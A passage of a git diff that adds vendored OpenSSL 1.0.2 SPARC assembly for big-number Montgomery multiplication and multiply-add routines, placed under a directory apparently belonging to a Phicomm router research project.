+	save	%sp,-128,%sp
+	restore
+	restore
+	restore
+	restore
+	restore
+	restore
+#endif
+	and	%sp,1,%g4
+	or	$sentinel,%fp,%fp
+	or	%g4,$sentinel,$sentinel
+
+	! copy arguments to global registers
+	mov	%i0,$tp
+	mov	%i1,$np
+	ld	[%i2+0],%f1	! load *n0
+	ld	[%i2+4],%f0
+	mov	%i3,$pwrtbl
+	srl	%i4,%g0,%i4	! pack last arguments
+	sllx	%i5,32,$pwr
+	or	%i4,$pwr,$pwr
+	fsrc2	%f0,%f60
+___
+
+# load tp[$NUM] ########################################################
+$code.=<<___;
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+___
+for($i=0; $i<14 && $i<$NUM; $i++) {
+$code.=<<___;
+	ldx	[$tp+$i*8],@A[$i]
+___
+}
+for(; $i<$NUM; $i++) {
+$code.=<<___;
+	ldd	[$tp+$i*8],@A[$i]
+___
+}
+# load np[$NUM] ########################################################
+$code.=<<___;
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+___
+for($i=0; $i<14 && $i<$NUM; $i++) {
+$code.=<<___;
+	ldx	[$np+$i*8],@N[$i]
+___
+}
+$code.=<<___;
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+___
+for(; $i<28 && $i<$NUM; $i++) {
+$code.=<<___;
+	ldx	[$np+$i*8],@N[$i]
+___
+}
+$code.=<<___;
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+___
+for(; $i<$NUM; $i++) {
+$code.=<<___;
+	ldx	[$np+$i*8],@N[$i]
+___
+}
+# load pwrtbl[pwr] ########################################################
+$code.=<<___;
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+
+	srlx	$pwr,	32,	%o4		! unpack $pwr
+	srl	$pwr,	%g0,	%o5
+	sub	%o4,	5,	%o4
+	mov	$pwrtbl,	%o7
+	sllx	%o4,	32,	$pwr		! re-pack $pwr
+	or	%o5,	$pwr,	$pwr
+	srl	%o5,	%o4,	%o5
+___
+	&load_ccr("%o7","%o5","%o4");
+$code.=<<___;
+	b	.Lstride_$NUM
+	nop
+.align	16
+.Lstride_$NUM:
+___
+for($i=0; $i<14 && $i<$NUM; $i+=2) {
+	&load_b_pair("%o7",@B[$i],@B[$i+1]);
+}
+$code.=<<___;
+	save	%sp,-128,%sp;		or	$sentinel,%fp,%fp
+___
+for(; $i<$NUM; $i+=2) {
+	&load_b_pair("%i7",@B[$i],@B[$i+1]);
+}
+$code.=<<___;
+	srax	$pwr,	32,	%o4		! unpack $pwr
+	srl	$pwr,	%g0,	%o5
+	sub	%o4,	5,	%o4
+	mov	$pwrtbl,	%i7
+	sllx	%o4,	32,	$pwr		! re-pack $pwr
+	or	%o5,	$pwr,	$pwr
+	srl	%o5,	%o4,	%o5
+___
+	&load_ccr("%i7","%o5","%o4",1);
+
+# magic ################################################################
+for($i=0; $i<5; $i++) {
+$code.=<<___;
+	.word	0x81b02940+$NUM-1	! montsqr	$NUM-1
+	fbu,pn	%fcc3,.Labort_$NUM
+#ifndef	__arch64__
+	and	%fp,$sentinel,$sentinel
+	brz,pn	$sentinel,.Labort_$NUM
+#endif
+	nop
+___
+}
+$code.=<<___;
+	wr	%o4,	%g0,	%ccr
+	.word	0x81b02920+$NUM-1	! montmul	$NUM-1
+	fbu,pn	%fcc3,.Labort_$NUM
+#ifndef	__arch64__
+	and	%fp,$sentinel,$sentinel
+	brz,pn	$sentinel,.Labort_$NUM
+#endif
+
+	srax	$pwr,	32,	%o4
+#ifdef	__arch64__
+	brgez	%o4,.Lstride_$NUM
+	restore
+	restore
+	restore
+	restore
+	restore
+#else
+	brgez	%o4,.Lstride_$NUM
+	restore;		and	%fp,$sentinel,$sentinel
+	restore;		and	%fp,$sentinel,$sentinel
+	restore;		and	%fp,$sentinel,$sentinel
+	restore;		and	%fp,$sentinel,$sentinel
+	 brz,pn	$sentinel,.Labort1_$NUM
+	restore
+#endif
+___
+
+# save tp[$NUM] ########################################################
+for($i=0; $i<14 && $i<$NUM; $i++) {
+$code.=<<___;
+	movxtod	@A[$i],@R[$i]
+___
+}
+$code.=<<___;
+#ifdef	__arch64__
+	restore
+#else
+	 and	%fp,$sentinel,$sentinel
+	restore
+	 and	$sentinel,1,%o7
+	 and	%fp,$sentinel,$sentinel
+	 srl	%fp,0,%fp		! just in case?
+	 or	%o7,$sentinel,$sentinel
+	brz,a,pn $sentinel,.Ldone_$NUM
+	mov	0,%i0		! return failure
+#endif
+___
+for($i=0; $i<$NUM; $i++) {
+$code.=<<___;
+	std	@R[$i],[$tp+$i*8]
+___
+}
+$code.=<<___;
+	mov	1,%i0		! return success
+.Ldone_$NUM:
+	ret
+	restore
+
+.Labort_$NUM:
+	restore
+	restore
+	restore
+	restore
+	restore
+.Labort1_$NUM:
+	restore
+
+	mov	0,%i0		! return failure
+	ret
+	restore
+.type	bn_pwr5_mont_t4_$NUM, #function
+.size	bn_pwr5_mont_t4_$NUM, .-bn_pwr5_mont_t4_$NUM
+___
+}
+
+for ($i=8;$i<=32;$i+=8) {
+	&generate_bn_pwr5_mont_t4($i);
+}
+
+{
+########################################################################
+# Fall-back subroutines
+#
+# copy of bn_mul_mont_vis3 adjusted for vectors of 64-bit values
+#
+($n0,$m0,$m1,$lo0,$hi0, $lo1,$hi1,$aj,$alo,$nj,$nlo,$tj)=
+	(map("%g$_",(1..5)),map("%o$_",(0..5,7)));
+
+# int bn_mul_mont(
+$rp="%o0";	# u64 *rp,
+$ap="%o1";	# const u64 *ap,
+$bp="%o2";	# const u64 *bp,
+$np="%o3";	# const u64 *np,
+$n0p="%o4";	# const BN_ULONG *n0,
+$num="%o5";	# int num);	# caller ensures that num is >=3
+$code.=<<___;
+.globl	bn_mul_mont_t4
+.align	32
+bn_mul_mont_t4:
+	add	%sp,	STACK_BIAS,	%g4	! real top of stack
+	sll	$num,	3,	$num		! size in bytes
+	add	$num,	63,	%g1
+	andn	%g1,	63,	%g1		! buffer size rounded up to 64 bytes
+	sub	%g4,	%g1,	%g1
+	andn	%g1,	63,	%g1		! align at 64 byte
+	sub	%g1,	STACK_FRAME,	%g1	! new top of stack
+	sub	%g1,	%g4,	%g1
+
+	save	%sp,	%g1,	%sp
+___
+#	+-------------------------------+<-----	%sp
+#	.				.
+#	+-------------------------------+<-----	aligned at 64 bytes
+#	| __int64 tmp[0]		|
+#	+-------------------------------+
+#	.				.
+#	.				.
+#	+-------------------------------+<-----	aligned at 64 bytes
+#	.				.
+($rp,$ap,$bp,$np,$n0p,$num)=map("%i$_",(0..5));
+($t0,$t1,$t2,$t3,$cnt,$tp,$bufsz)=map("%l$_",(0..7));
+($ovf,$i)=($t0,$t1);
+$code.=<<___;
+	ld	[$n0p+0],	$t0	! pull n0[0..1] value
+	ld	[$n0p+4],	$t1
+	add	%sp, STACK_BIAS+STACK_FRAME, $tp
+	ldx	[$bp+0],	$m0	! m0=bp[0]
+	sllx	$t1,	32,	$n0
+	add	$bp,	8,	$bp
+	or	$t0,	$n0,	$n0
+
+	ldx	[$ap+0],	$aj	! ap[0]
+
+	mulx	$aj,	$m0,	$lo0	! ap[0]*bp[0]
+	umulxhi	$aj,	$m0,	$hi0
+
+	ldx	[$ap+8],	$aj	! ap[1]
+	add	$ap,	16,	$ap
+	ldx	[$np+0],	$nj	! np[0]
+
+	mulx	$lo0,	$n0,	$m1	! "tp[0]"*n0
+
+	mulx	$aj,	$m0,	$alo	! ap[1]*bp[0]
+	umulxhi	$aj,	$m0,	$aj	! ahi=aj
+
+	mulx	$nj,	$m1,	$lo1	! np[0]*m1
+	umulxhi	$nj,	$m1,	$hi1
+
+	ldx	[$np+8],	$nj	! np[1]
+
+	addcc	$lo0,	$lo1,	$lo1
+	add	$np,	16,	$np
+	addxc	%g0,	$hi1,	$hi1
+
+	mulx	$nj,	$m1,	$nlo	! np[1]*m1
+	umulxhi	$nj,	$m1,	$nj	! nhi=nj
+
+	ba	.L1st
+	sub	$num,	24,	$cnt	! cnt=num-3
+
+.align	16
+.L1st:
+	addcc	$alo,	$hi0,	$lo0
+	addxc	$aj,	%g0,	$hi0
+
+	ldx	[$ap+0],	$aj	! ap[j]
+	addcc	$nlo,	$hi1,	$lo1
+	add	$ap,	8,	$ap
+	addxc	$nj,	%g0,	$hi1	! nhi=nj
+
+	ldx	[$np+0],	$nj	! np[j]
+	mulx	$aj,	$m0,	$alo	! ap[j]*bp[0]
+	add	$np,	8,	$np
+	umulxhi	$aj,	$m0,	$aj	! ahi=aj
+
+	mulx	$nj,	$m1,	$nlo	! np[j]*m1
+	addcc	$lo0,	$lo1,	$lo1	! np[j]*m1+ap[j]*bp[0]
+	umulxhi	$nj,	$m1,	$nj	! nhi=nj
+	addxc	%g0,	$hi1,	$hi1
+	stxa	$lo1,	[$tp]0xe2	! tp[j-1]
+	add	$tp,	8,	$tp	! tp++
+
+	brnz,pt	$cnt,	.L1st
+	sub	$cnt,	8,	$cnt	! j--
+!.L1st
+	addcc	$alo,	$hi0,	$lo0
+	addxc	$aj,	%g0,	$hi0	! ahi=aj
+
+	addcc	$nlo,	$hi1,	$lo1
+	addxc	$nj,	%g0,	$hi1
+	addcc	$lo0,	$lo1,	$lo1	! np[j]*m1+ap[j]*bp[0]
+	addxc	%g0,	$hi1,	$hi1
+	stxa	$lo1,	[$tp]0xe2	! tp[j-1]
+	add	$tp,	8,	$tp
+
+	addcc	$hi0,	$hi1,	$hi1
+	addxc	%g0,	%g0,	$ovf	! upmost overflow bit
+	stxa	$hi1,	[$tp]0xe2
+	add	$tp,	8,	$tp
+
+	ba	.Louter
+	sub	$num,	16,	$i	! i=num-2
+
+.align	16
+.Louter:
+	ldx	[$bp+0],	$m0	! m0=bp[i]
+	add	$bp,	8,	$bp
+
+	sub	$ap,	$num,	$ap	! rewind
+	sub	$np,	$num,	$np
+	sub	$tp,	$num,	$tp
+
+	ldx	[$ap+0],	$aj	! ap[0]
+	ldx	[$np+0],	$nj	! np[0]
+
+	mulx	$aj,	$m0,	$lo0	! ap[0]*bp[i]
+	ldx	[$tp],		$tj	! tp[0]
+	umulxhi	$aj,	$m0,	$hi0
+	ldx	[$ap+8],	$aj	! ap[1]
+	addcc	$lo0,	$tj,	$lo0	! ap[0]*bp[i]+tp[0]
+	mulx	$aj,	$m0,	$alo	! ap[1]*bp[i]
+	addxc	%g0,	$hi0,	$hi0
+	mulx	$lo0,	$n0,	$m1	! tp[0]*n0
+	umulxhi	$aj,	$m0,	$aj	! ahi=aj
+	mulx	$nj,	$m1,	$lo1	! np[0]*m1
+	add	$ap,	16,	$ap
+	umulxhi	$nj,	$m1,	$hi1
+	ldx	[$np+8],	$nj	! np[1]
+	add	$np,	16,	$np
+	addcc	$lo1,	$lo0,	$lo1
+	mulx	$nj,	$m1,	$nlo	! np[1]*m1
+	addxc	%g0,	$hi1,	$hi1
+	umulxhi	$nj,	$m1,	$nj	! nhi=nj
+
+	ba	.Linner
+	sub	$num,	24,	$cnt	! cnt=num-3
+.align	16
+.Linner:
+	addcc	$alo,	$hi0,	$lo0
+	ldx	[$tp+8],	$tj	! tp[j]
+	addxc	$aj,	%g0,	$hi0	! ahi=aj
+	ldx	[$ap+0],	$aj	! ap[j]
+	add	$ap,	8,	$ap
+	addcc	$nlo,	$hi1,	$lo1
+	mulx	$aj,	$m0,	$alo	! ap[j]*bp[i]
+	addxc	$nj,	%g0,	$hi1	! nhi=nj
+	ldx	[$np+0],	$nj	! np[j]
+	add	$np,	8,	$np
+	umulxhi	$aj,	$m0,	$aj	! ahi=aj
+	addcc	$lo0,	$tj,	$lo0	! ap[j]*bp[i]+tp[j]
+	mulx	$nj,	$m1,	$nlo	! np[j]*m1
+	addxc	%g0,	$hi0,	$hi0
+	umulxhi	$nj,	$m1,	$nj	! nhi=nj
+	addcc	$lo1,	$lo0,	$lo1	! np[j]*m1+ap[j]*bp[i]+tp[j]
+	addxc	%g0,	$hi1,	$hi1
+	stx	$lo1,	[$tp]		! tp[j-1]
+	add	$tp,	8,	$tp
+	brnz,pt	$cnt,	.Linner
+	sub	$cnt,	8,	$cnt
+!.Linner
+	ldx	[$tp+8],	$tj	! tp[j]
+	addcc	$alo,	$hi0,	$lo0
+	addxc	$aj,	%g0,	$hi0	! ahi=aj
+	addcc	$lo0,	$tj,	$lo0	! ap[j]*bp[i]+tp[j]
+	addxc	%g0,	$hi0,	$hi0
+
+	addcc	$nlo,	$hi1,	$lo1
+	addxc	$nj,	%g0,	$hi1	! nhi=nj
+	addcc	$lo1,	$lo0,	$lo1	! np[j]*m1+ap[j]*bp[i]+tp[j]
+	addxc	%g0,	$hi1,	$hi1
+	stx	$lo1,	[$tp]		! tp[j-1]
+
+	subcc	%g0,	$ovf,	%g0	! move upmost overflow to CCR.xcc
+	addxccc	$hi1,	$hi0,	$hi1
+	addxc	%g0,	%g0,	$ovf
+	stx	$hi1,	[$tp+8]
+	add	$tp,	16,	$tp
+
+	brnz,pt	$i,	.Louter
+	sub	$i,	8,	$i
+
+	sub	$ap,	$num,	$ap	! rewind
+	sub	$np,	$num,	$np
+	sub	$tp,	$num,	$tp
+	ba	.Lsub
+	subcc	$num,	8,	$cnt	! cnt=num-1 and clear CCR.xcc
+
+.align	16
+.Lsub:
+	ldx	[$tp],		$tj
+	add	$tp,	8,	$tp
+	ldx	[$np+0],	$nj
+	add	$np,	8,	$np
+	subccc	$tj,	$nj,	$t2	! tp[j]-np[j]
+	srlx	$tj,	32,	$tj
+	srlx	$nj,	32,	$nj
+	subccc	$tj,	$nj,	$t3
+	add	$rp,	8,	$rp
+	st	$t2,	[$rp-4]		! reverse order
+	st	$t3,	[$rp-8]
+	brnz,pt	$cnt,	.Lsub
+	sub	$cnt,	8,	$cnt
+
+	sub	$np,	$num,	$np	! rewind
+	sub	$tp,	$num,	$tp
+	sub	$rp,	$num,	$rp
+
+	subc	$ovf,	%g0,	$ovf	! handle upmost overflow bit
+	and	$tp,	$ovf,	$ap
+	andn	$rp,	$ovf,	$np
+	or	$np,	$ap,	$ap	! ap=borrow?tp:rp
+	ba	.Lcopy
+	sub	$num,	8,	$cnt
+
+.align	16
+.Lcopy:					! copy or in-place refresh
+	ldx	[$ap+0],	$t2
+	add	$ap,	8,	$ap
+	stx	%g0,	[$tp]		! zap
+	add	$tp,	8,	$tp
+	stx	$t2,	[$rp+0]
+	add	$rp,	8,	$rp
+	brnz	$cnt,	.Lcopy
+	sub	$cnt,	8,	$cnt
+
+	mov	1,	%o0
+	ret
+	restore
+.type	bn_mul_mont_t4, #function
+.size	bn_mul_mont_t4, .-bn_mul_mont_t4
+___
+
+# int bn_mul_mont_gather5(
+$rp="%o0";	# u64 *rp,
+$ap="%o1";	# const u64 *ap,
+$bp="%o2";	# const u64 *pwrtbl,
+$np="%o3";	# const u64 *np,
+$n0p="%o4";	# const BN_ULONG *n0,
+$num="%o5";	# int num,	# caller ensures that num is >=3
+		# int power);
+$code.=<<___;
+.globl	bn_mul_mont_gather5_t4
+.align	32
+bn_mul_mont_gather5_t4:
+	add	%sp,	STACK_BIAS,	%g4	! real top of stack
+	sll	$num,	3,	$num		! size in bytes
+	add	$num,	63,	%g1
+	andn	%g1,	63,	%g1		! buffer size rounded up to 64 bytes
+	sub	%g4,	%g1,	%g1
+	andn	%g1,	63,	%g1		! align at 64 byte
+	sub	%g1,	STACK_FRAME,	%g1	! new top of stack
+	sub	%g1,	%g4,	%g1
+	LDPTR	[%sp+STACK_7thARG],	%g4	! load power, 7th argument
+
+	save	%sp,	%g1,	%sp
+___
+#	+-------------------------------+<-----	%sp
+#	.				.
+#	+-------------------------------+<-----	aligned at 64 bytes
+#	| __int64 tmp[0]		|
+#	+-------------------------------+
+#	.				.
+#	.				.
+#	+-------------------------------+<-----	aligned at 64 bytes
+#	.				.
+($rp,$ap,$bp,$np,$n0p,$num)=map("%i$_",(0..5));
+($t0,$t1,$t2,$t3,$cnt,$tp,$bufsz,$ccr)=map("%l$_",(0..7));
+($ovf,$i)=($t0,$t1);
+	&load_ccr($bp,"%g4",$ccr);
+	&load_b($bp,$m0,"%o7");		# m0=bp[0]
+
+$code.=<<___;
+	ld	[$n0p+0],	$t0	! pull n0[0..1] value
+	ld	[$n0p+4],	$t1
+	add	%sp, STACK_BIAS+STACK_FRAME, $tp
+	sllx	$t1,	32,	$n0
+	or	$t0,	$n0,	$n0
+
+	ldx	[$ap+0],	$aj	! ap[0]
+
+	mulx	$aj,	$m0,	$lo0	! ap[0]*bp[0]
+	umulxhi	$aj,	$m0,	$hi0
+
+	ldx	[$ap+8],	$aj	! ap[1]
+	add	$ap,	16,	$ap
+	ldx	[$np+0],	$nj	! np[0]
+
+	mulx	$lo0,	$n0,	$m1	! "tp[0]"*n0
+
+	mulx	$aj,	$m0,	$alo	! ap[1]*bp[0]
+	umulxhi	$aj,	$m0,	$aj	! ahi=aj
+
+	mulx	$nj,	$m1,	$lo1	! np[0]*m1
+	umulxhi	$nj,	$m1,	$hi1
+
+	ldx	[$np+8],	$nj	! np[1]
+
+	addcc	$lo0,	$lo1,	$lo1
+	add	$np,	16,	$np
+	addxc	%g0,	$hi1,	$hi1
+
+	mulx	$nj,	$m1,	$nlo	! np[1]*m1
+	umulxhi	$nj,	$m1,	$nj	! nhi=nj
+
+	ba	.L1st_g5
+	sub	$num,	24,	$cnt	! cnt=num-3
+
+.align	16
+.L1st_g5:
+	addcc	$alo,	$hi0,	$lo0
+	addxc	$aj,	%g0,	$hi0
+
+	ldx	[$ap+0],	$aj	! ap[j]
+	addcc	$nlo,	$hi1,	$lo1
+	add	$ap,	8,	$ap
+	addxc	$nj,	%g0,	$hi1	! nhi=nj
+
+	ldx	[$np+0],	$nj	! np[j]
+	mulx	$aj,	$m0,	$alo	! ap[j]*bp[0]
+	add	$np,	8,	$np
+	umulxhi	$aj,	$m0,	$aj	! ahi=aj
+
+	mulx	$nj,	$m1,	$nlo	! np[j]*m1
+	addcc	$lo0,	$lo1,	$lo1	! np[j]*m1+ap[j]*bp[0]
+	umulxhi	$nj,	$m1,	$nj	! nhi=nj
+	addxc	%g0,	$hi1,	$hi1
+	stxa	$lo1,	[$tp]0xe2	! tp[j-1]
+	add	$tp,	8,	$tp	! tp++
+
+	brnz,pt	$cnt,	.L1st_g5
+	sub	$cnt,	8,	$cnt	! j--
+!.L1st_g5
+	addcc	$alo,	$hi0,	$lo0
+	addxc	$aj,	%g0,	$hi0	! ahi=aj
+
+	addcc	$nlo,	$hi1,	$lo1
+	addxc	$nj,	%g0,	$hi1
+	addcc	$lo0,	$lo1,	$lo1	! np[j]*m1+ap[j]*bp[0]
+	addxc	%g0,	$hi1,	$hi1
+	stxa	$lo1,	[$tp]0xe2	! tp[j-1]
+	add	$tp,	8,	$tp
+
+	addcc	$hi0,	$hi1,	$hi1
+	addxc	%g0,	%g0,	$ovf	! upmost overflow bit
+	stxa	$hi1,	[$tp]0xe2
+	add	$tp,	8,	$tp
+
+	ba	.Louter_g5
+	sub	$num,	16,	$i	! i=num-2
+
+.align	16
+.Louter_g5:
+	wr	$ccr,	%g0,	%ccr
+___
+	&load_b($bp,$m0);		# m0=bp[i]
+$code.=<<___;
+	sub	$ap,	$num,	$ap	! rewind
+	sub	$np,	$num,	$np
+	sub	$tp,	$num,	$tp
+
+	ldx	[$ap+0],	$aj	! ap[0]
+	ldx	[$np+0],	$nj	! np[0]
+
+	mulx	$aj,	$m0,	$lo0	! ap[0]*bp[i]
+	ldx	[$tp],		$tj	! tp[0]
+	umulxhi	$aj,	$m0,	$hi0
+	ldx	[$ap+8],	$aj	! ap[1]
+	addcc	$lo0,	$tj,	$lo0	! ap[0]*bp[i]+tp[0]
+	mulx	$aj,	$m0,	$alo	! ap[1]*bp[i]
+	addxc	%g0,	$hi0,	$hi0
+	mulx	$lo0,	$n0,	$m1	! tp[0]*n0
+	umulxhi	$aj,	$m0,	$aj	! ahi=aj
+	mulx	$nj,	$m1,	$lo1	! np[0]*m1
+	add	$ap,	16,	$ap
+	umulxhi	$nj,	$m1,	$hi1
+	ldx	[$np+8],	$nj	! np[1]
+	add	$np,	16,	$np
+	addcc	$lo1,	$lo0,	$lo1
+	mulx	$nj,	$m1,	$nlo	! np[1]*m1
+	addxc	%g0,	$hi1,	$hi1
+	umulxhi	$nj,	$m1,	$nj	! nhi=nj
+
+	ba	.Linner_g5
+	sub	$num,	24,	$cnt	! cnt=num-3
+.align	16
+.Linner_g5:
+	addcc	$alo,	$hi0,	$lo0
+	ldx	[$tp+8],	$tj	! tp[j]
+	addxc	$aj,	%g0,	$hi0	! ahi=aj
+	ldx	[$ap+0],	$aj	! ap[j]
+	add	$ap,	8,	$ap
+	addcc	$nlo,	$hi1,	$lo1
+	mulx	$aj,	$m0,	$alo	! ap[j]*bp[i]
+	addxc	$nj,	%g0,	$hi1	! nhi=nj
+	ldx	[$np+0],	$nj	! np[j]
+	add	$np,	8,	$np
+	umulxhi	$aj,	$m0,	$aj	! ahi=aj
+	addcc	$lo0,	$tj,	$lo0	! ap[j]*bp[i]+tp[j]
+	mulx	$nj,	$m1,	$nlo	! np[j]*m1
+	addxc	%g0,	$hi0,	$hi0
+	umulxhi	$nj,	$m1,	$nj	! nhi=nj
+	addcc	$lo1,	$lo0,	$lo1	! np[j]*m1+ap[j]*bp[i]+tp[j]
+	addxc	%g0,	$hi1,	$hi1
+	stx	$lo1,	[$tp]		! tp[j-1]
+	add	$tp,	8,	$tp
+	brnz,pt	$cnt,	.Linner_g5
+	sub	$cnt,	8,	$cnt
+!.Linner_g5
+	ldx	[$tp+8],	$tj	! tp[j]
+	addcc	$alo,	$hi0,	$lo0
+	addxc	$aj,	%g0,	$hi0	! ahi=aj
+	addcc	$lo0,	$tj,	$lo0	! ap[j]*bp[i]+tp[j]
+	addxc	%g0,	$hi0,	$hi0
+
+	addcc	$nlo,	$hi1,	$lo1
+	addxc	$nj,	%g0,	$hi1	! nhi=nj
+	addcc	$lo1,	$lo0,	$lo1	! np[j]*m1+ap[j]*bp[i]+tp[j]
+	addxc	%g0,	$hi1,	$hi1
+	stx	$lo1,	[$tp]		! tp[j-1]
+
+	subcc	%g0,	$ovf,	%g0	! move upmost overflow to CCR.xcc
+	addxccc	$hi1,	$hi0,	$hi1
+	addxc	%g0,	%g0,	$ovf
+	stx	$hi1,	[$tp+8]
+	add	$tp,	16,	$tp
+
+	brnz,pt	$i,	.Louter_g5
+	sub	$i,	8,	$i
+
+	sub	$ap,	$num,	$ap	! rewind
+	sub	$np,	$num,	$np
+	sub	$tp,	$num,	$tp
+	ba	.Lsub_g5
+	subcc	$num,	8,	$cnt	! cnt=num-1 and clear CCR.xcc
+
+.align	16
+.Lsub_g5:
+	ldx	[$tp],		$tj
+	add	$tp,	8,	$tp
+	ldx	[$np+0],	$nj
+	add	$np,	8,	$np
+	subccc	$tj,	$nj,	$t2	! tp[j]-np[j]
+	srlx	$tj,	32,	$tj
+	srlx	$nj,	32,	$nj
+	subccc	$tj,	$nj,	$t3
+	add	$rp,	8,	$rp
+	st	$t2,	[$rp-4]		! reverse order
+	st	$t3,	[$rp-8]
+	brnz,pt	$cnt,	.Lsub_g5
+	sub	$cnt,	8,	$cnt
+
+	sub	$np,	$num,	$np	! rewind
+	sub	$tp,	$num,	$tp
+	sub	$rp,	$num,	$rp
+
+	subc	$ovf,	%g0,	$ovf	! handle upmost overflow bit
+	and	$tp,	$ovf,	$ap
+	andn	$rp,	$ovf,	$np
+	or	$np,	$ap,	$ap	! ap=borrow?tp:rp
+	ba	.Lcopy_g5
+	sub	$num,	8,	$cnt
+
+.align	16
+.Lcopy_g5:				! copy or in-place refresh
+	ldx	[$ap+0],	$t2
+	add	$ap,	8,	$ap
+	stx	%g0,	[$tp]		! zap
+	add	$tp,	8,	$tp
+	stx	$t2,	[$rp+0]
+	add	$rp,	8,	$rp
+	brnz	$cnt,	.Lcopy_g5
+	sub	$cnt,	8,	$cnt
+
+	mov	1,	%o0
+	ret
+	restore
+.type	bn_mul_mont_gather5_t4, #function
+.size	bn_mul_mont_gather5_t4, .-bn_mul_mont_gather5_t4
+___
+}
+
+$code.=<<___;
+.globl	bn_flip_t4
+.align	32
+bn_flip_t4:
+.Loop_flip:
+	ld	[%o1+0],	%o4
+	sub	%o2,	1,	%o2
+	ld	[%o1+4],	%o5
+	add	%o1,	8,	%o1
+	st	%o5,	[%o0+0]
+	st	%o4,	[%o0+4]
+	brnz	%o2,	.Loop_flip
+	add	%o0,	8,	%o0
+	retl
+	nop
+.type	bn_flip_t4, #function
+.size	bn_flip_t4, .-bn_flip_t4
+
+.globl	bn_flip_n_scatter5_t4
+.align	32
+bn_flip_n_scatter5_t4:
+	sll	%o3,	3,	%o3
+	srl	%o1,	1,	%o1
+	add	%o3,	%o2,	%o2	! &pwrtbl[pwr]
+	sub	%o1,	1,	%o1
+.Loop_flip_n_scatter5:
+	ld	[%o0+0],	%o4	! inp[i]
+	ld	[%o0+4],	%o5
+	add	%o0,	8,	%o0
+	sllx	%o5,	32,	%o5
+	or	%o4,	%o5,	%o5
+	stx	%o5,	[%o2]
+	add	%o2,	32*8,	%o2
+	brnz	%o1,	.Loop_flip_n_scatter5
+	sub	%o1,	1,	%o1
+	retl
+	nop
+.type	bn_flip_n_scatter5_t4, #function
+.size	bn_flip_n_scatter5_t4, .-bn_flip_n_scatter5_t4
+
+.globl	bn_gather5_t4
+.align	32
+bn_gather5_t4:
+___
+	&load_ccr("%o2","%o3","%g1");
+$code.=<<___;
+	sub	%o1,	1,	%o1
+.Loop_gather5:
+___
+	&load_b("%o2","%g1");
+$code.=<<___;
+	stx	%g1,	[%o0]
+	add	%o0,	8,	%o0
+	brnz	%o1,	.Loop_gather5
+	sub	%o1,	1,	%o1
+
+	retl
+	nop
+.type	bn_gather5_t4, #function
+.size	bn_gather5_t4, .-bn_gather5_t4
+
+.asciz	"Montgomery Multiplication for SPARC T4, David S. Miller, Andy Polyakov"
+.align	4
+___
+
+&emit_assembler();
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv8.S b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv8.S
new file mode 100644
index 0000000..88c5dc4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv8.S
@@ -0,0 +1,1458 @@
+.ident	"sparcv8.s, Version 1.4"
+.ident	"SPARC v8 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
+
+/*
+ * ====================================================================
+ * Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+ * project.
+ *
+ * Rights for redistribution and usage in source and binary forms are
+ * granted according to the OpenSSL license. Warranty of any kind is
+ * disclaimed.
+ * ====================================================================
+ */
+
+/*
+ * This is my modest contributon to OpenSSL project (see
+ * http://www.openssl.org/ for more information about it) and is
+ * a drop-in SuperSPARC ISA replacement for crypto/bn/bn_asm.c
+ * module. For updates see http://fy.chalmers.se/~appro/hpe/.
+ *
+ * See bn_asm.sparc.v8plus.S for more details.
+ */
+
+/*
+ * Revision history.
+ *
+ * 1.1	- new loop unrolling model(*);
+ * 1.2	- made gas friendly;
+ * 1.3	- fixed problem with /usr/ccs/lib/cpp;
+ * 1.4	- some retunes;
+ *
+ * (*)	see bn_asm.sparc.v8plus.S for details
+ */
+
+.section	".text",#alloc,#execinstr
+.file		"bn_asm.sparc.v8.S"
+
+.align	32
+
+.global bn_mul_add_words
+/*
+ * BN_ULONG bn_mul_add_words(rp,ap,num,w)
+ * BN_ULONG *rp,*ap;
+ * int num;
+ * BN_ULONG w;
+ */
+bn_mul_add_words:
+	cmp	%o2,0
+	bg,a	.L_bn_mul_add_words_proceed
+	ld	[%o1],%g2
+	retl
+	clr	%o0
+
+.L_bn_mul_add_words_proceed:
+	andcc	%o2,-4,%g0
+	bz	.L_bn_mul_add_words_tail
+	clr	%o5
+
+.L_bn_mul_add_words_loop:
+	ld	[%o0],%o4
+	ld	[%o1+4],%g3
+	umul	%o3,%g2,%g2
+	rd	%y,%g1
+	addcc	%o4,%o5,%o4
+	addx	%g1,0,%g1
+	addcc	%o4,%g2,%o4
+	st	%o4,[%o0]
+	addx	%g1,0,%o5
+
+	ld	[%o0+4],%o4
+	ld	[%o1+8],%g2
+	umul	%o3,%g3,%g3
+	dec	4,%o2
+	rd	%y,%g1
+	addcc	%o4,%o5,%o4
+	addx	%g1,0,%g1
+	addcc	%o4,%g3,%o4
+	st	%o4,[%o0+4]
+	addx	%g1,0,%o5
+
+	ld	[%o0+8],%o4
+	ld	[%o1+12],%g3
+	umul	%o3,%g2,%g2
+	inc	16,%o1
+	rd	%y,%g1
+	addcc	%o4,%o5,%o4
+	addx	%g1,0,%g1
+	addcc	%o4,%g2,%o4
+	st	%o4,[%o0+8]
+	addx	%g1,0,%o5
+
+	ld	[%o0+12],%o4
+	umul	%o3,%g3,%g3
+	inc	16,%o0
+	rd	%y,%g1
+	addcc	%o4,%o5,%o4
+	addx	%g1,0,%g1
+	addcc	%o4,%g3,%o4
+	st	%o4,[%o0-4]
+	addx	%g1,0,%o5
+	andcc	%o2,-4,%g0
+	bnz,a	.L_bn_mul_add_words_loop
+	ld	[%o1],%g2
+
+	tst	%o2
+	bnz,a	.L_bn_mul_add_words_tail
+	ld	[%o1],%g2
+.L_bn_mul_add_words_return:
+	retl
+	mov	%o5,%o0
+	nop
+
+.L_bn_mul_add_words_tail:
+	ld	[%o0],%o4
+	umul	%o3,%g2,%g2
+	addcc	%o4,%o5,%o4
+	rd	%y,%g1
+	addx	%g1,0,%g1
+	addcc	%o4,%g2,%o4
+	addx	%g1,0,%o5
+	deccc	%o2
